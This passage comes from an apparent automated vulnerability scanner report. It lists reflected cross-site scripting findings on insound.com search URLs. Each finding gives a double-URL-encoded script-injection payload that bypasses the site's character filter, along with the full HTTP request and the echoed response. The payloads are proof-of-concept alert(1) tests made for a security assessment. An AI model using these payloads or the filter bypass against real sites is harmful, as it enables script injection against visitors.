   <link re
...[SNIP]...
<input type="hidden" name="query" value="CFCF5f843"><script>alert(1)</script>243c2d95501" />
...[SNIP]...

1.25. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cameo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 11c11%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec331f00e8fa was submitted in the REST URL parameter 3. This input was echoed as 11c11</title><script>alert(1)</script>c331f00e8fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cameo11c11%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec331f00e8fa&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9tvihq52cibg1dhds13oei83s0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=422758122; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=235224021; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Cameo11c11</title><script>alert(1)</script>c331f00e8fa</title>
...[SNIP]...

1.26. http://www.insound.com/search/query/Cameo&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Cameo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f690810b46 was submitted in the REST URL parameter 3. This input was echoed as 27fd2"><script>alert(1)</script>8f690810b46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Cameo27fd2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8f690810b46&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=hegtsa2n19qb12h1b0rga4l8f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=562204887; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=400406898; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Cameo27fd2"><script>alert(1)</script>8f690810b46" />
...[SNIP]...

1.27. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camera%20Obscura&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9dbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecf01457e40f was submitted in the REST URL parameter 3. This input was echoed as c9dbc"><script>alert(1)</script>cf01457e40f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camera%20Obscurac9dbc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecf01457e40f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4kt9akaqie9261scq57o5e4mi5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=247155637; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=182984944; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camera Obscurac9dbc"><script>alert(1)</script>cf01457e40f" />
...[SNIP]...

1.28. http://www.insound.com/search/query/Camera%20Obscura&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camera%20Obscura&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4c77b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf73ed124e was submitted in the REST URL parameter 3. This input was echoed as 4c77b</title><script>alert(1)</script>baf73ed124e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camera%20Obscura4c77b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf73ed124e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k78mtfcm3g97l95gc7g88jkg56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=255010884; expires=Sun, 09-Jan-2011 02:39:09 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=179227764; expires=Sun, 09-Jan-2011 02:39:09 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camera Obscura4c77b</title><script>alert(1)</script>baf73ed124e</title>
...[SNIP]...

1.29. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camp%20Lo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f14bd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef8d193011e was submitted in the REST URL parameter 3. This input was echoed as f14bd</title><script>alert(1)</script>f8d193011e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camp%20Lof14bd%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef8d193011e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=uu79f4ha13vkh30f2dkjtp9686; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=55527466; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=34537506; expires=Sun, 09-Jan-2011 02:39:02 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camp Lof14bd</title><script>alert(1)</script>f8d193011e</title>
...[SNIP]...

1.30. http://www.insound.com/search/query/Camp%20Lo&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camp%20Lo&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3081c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7be6001c5ac was submitted in the REST URL parameter 3. This input was echoed as 3081c"><script>alert(1)</script>7be6001c5ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camp%20Lo3081c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7be6001c5ac&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=tbh5i32hh0qdav8oj20qh7d530; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=139096742; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=299575150; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camp Lo3081c"><script>alert(1)</script>7be6001c5ac" />
...[SNIP]...

1.31. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Beethoven&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ef3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20b1bcf624f was submitted in the REST URL parameter 3. This input was echoed as b9ef3"><script>alert(1)</script>20b1bcf624f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Beethovenb9ef3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e20b1bcf624f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4rcshk9thvab95oboc2cdjo734; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=550012324; expires=Sun, 09-Jan-2011 02:38:54 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=562711935; expires=Sun, 09-Jan-2011 02:38:54 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camper Van Beethovenb9ef3"><script>alert(1)</script>20b1bcf624f" />
...[SNIP]...

1.32. http://www.insound.com/search/query/Camper%20Van%20Beethoven&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Beethoven&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4cb53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54338b35555 was submitted in the REST URL parameter 3. This input was echoed as 4cb53</title><script>alert(1)</script>54338b35555 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Beethoven4cb53%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54338b35555&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ugng25el01jvq8nr74bpse3b02; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=412975750; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=354783998; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camper Van Beethoven4cb53</title><script>alert(1)</script>54338b35555</title>
...[SNIP]...

1.33. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Chadbourne&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dcf05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e936827edfe was submitted in the REST URL parameter 3. This input was echoed as dcf05"><script>alert(1)</script>936827edfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Chadbournedcf05%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e936827edfe&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=d8r7n4sm72cgfgengo9uonbp96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=101771614; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=128754219; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camper Van Chadbournedcf05"><script>alert(1)</script>936827edfe" />
...[SNIP]...

1.34. http://www.insound.com/search/query/Camper%20Van%20Chadbourne&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camper%20Van%20Chadbourne&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 45350%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e9b2c81899 was submitted in the REST URL parameter 3. This input was echoed as 45350</title><script>alert(1)</script>9e9b2c81899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camper%20Van%20Chadbourne45350%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9e9b2c81899&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vbh0hmsrl3r8gjpfetd03fp2s2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=441191144; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=268677198; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camper Van Chadbourne45350</title><script>alert(1)</script>9e9b2c81899</title>
...[SNIP]...

1.35. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camu%20Tao&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4602a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52fca981ab6 was submitted in the REST URL parameter 3. This input was echoed as 4602a"><script>alert(1)</script>52fca981ab6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camu%20Tao4602a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52fca981ab6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7fpi79lt9l0a5jaqo8d1uempc5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=378917313; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=120909250; expires=Sun, 09-Jan-2011 02:38:53 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Camu Tao4602a"><script>alert(1)</script>52fca981ab6" />
...[SNIP]...

1.36. http://www.insound.com/search/query/Camu%20Tao&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Camu%20Tao&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 2a5b5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2927d88952d was submitted in the REST URL parameter 3. This input was echoed as 2a5b5</title><script>alert(1)</script>2927d88952d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Camu%20Tao2a5b5%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2927d88952d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=bber7m2f2vt1tmvvk1g8pgnv14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=240695343; expires=Sun, 09-Jan-2011 02:38:59 GMT; path=/; domain=.insound.com
